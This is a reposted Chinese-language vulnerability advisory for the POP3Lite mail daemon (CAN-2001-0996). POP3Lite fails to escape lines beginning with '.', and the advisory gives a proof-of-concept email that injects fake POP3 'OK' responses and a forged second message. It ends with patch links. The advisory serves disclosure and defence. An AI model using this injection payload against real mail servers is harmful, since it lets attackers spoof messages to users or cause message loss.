POP3Lite 输入验证漏洞

发布日期：2001-09-03
更新日期：2001-09-11

受影响系统：

POP3Lite POP3Lite 0.2.3b
- FreeBSD FreeBSD 5.0
Debian Linux 2.2r3 unstable
Debian Linux 2.2r3 testing
POP3Lite POP3Lite 0.2.3
- FreeBSD FreeBSD 5.0
Debian Linux 2.2r3 unstable
Debian Linux 2.2r3 testing

不受影响系统：

POP3Lite POP3Lite 0.2.4
- FreeBSD FreeBSD 5.0
Debian Linux 2.2r3 unstable
Debian Linux 2.2r3 testing

描述：

---

BUGTRAQ ID: 3278
CVE(CAN) ID: CAN-2001-0996

POP3Lite是Linux和BSD平台下的免费，开放源代码的POP3守护程序。

发现POP3Lite没有过滤信件中以“.”开始的行，这至少可能导致意外情况的发生，如
果我们精心构造这封信件的内容，就可能导致把任意伪造的系统相应信息发送给从该服
务器上下载邮件的用户。

远程攻击者利用这个漏洞，可能插入任意信息或导致信息丢失，也可能导致匿名Email
攻击或者是拒绝服务攻击，这取决于客户端如何解释这些而已的输入。

<*来源：Daniel Roethlisberger （daniel@roe.ch）*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Daniel Roethlisberger （daniel@roe.ch）提供了如下测试代码：

把下面的内容发给从有漏洞的服务器上下载邮件的用户：

Date: Wed, 29 Aug 2001 19:31:41 -0400
From: "Cash Plan" <cashplan62@hotmail.com>
To: victim@victim.net
Subject: DAILY CASH PLAN & COMPLETE BUSINESS SYSTEM

Your DAILY CASH PLAN & COMPLETE BUSINESS SYSTEM
THIS IS REAL !! ON CD ROM!!

----FREE---------- FREE-------------- FREE--------------- FREE-----
Stealth Mail Bomber " unlocked " No Registration Required
Retails for $300 and up "This Bulk e-mail software will
** EXPLODE YOUR BUSINESS **
NO Tricks, NO Gimmicks, NO Changing Long Distance Carriers, NO Games
----FREE---------- FREE-------------- FREE--------------- FREE-----

.
OK message deleted
OK 1234 octets
Received: from mail.anything.com (123.123.123.123)
by mail.victim.net with SMTP; 1 Apr 2001 00:42:00 -0000
Date: Sat, 1 Apr 2001 00:23:00 -0000
From: anyone@anything.com
To: victim@victim.net
Subject: anything

bloerps


建议：

---

厂商补丁：

POP3Lite 0.2.4已经修正了这个问题，请立即到厂商的主页下载：

POP3Lite upgrade POP3Lite
ftp://pop3lite.sourceforge.net/pub/pop3lite/

Debian upgrade POP3Lite 0.4.2a-1 unstable
http://packages.debian.org/unstable/mail/pop3lite.html

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有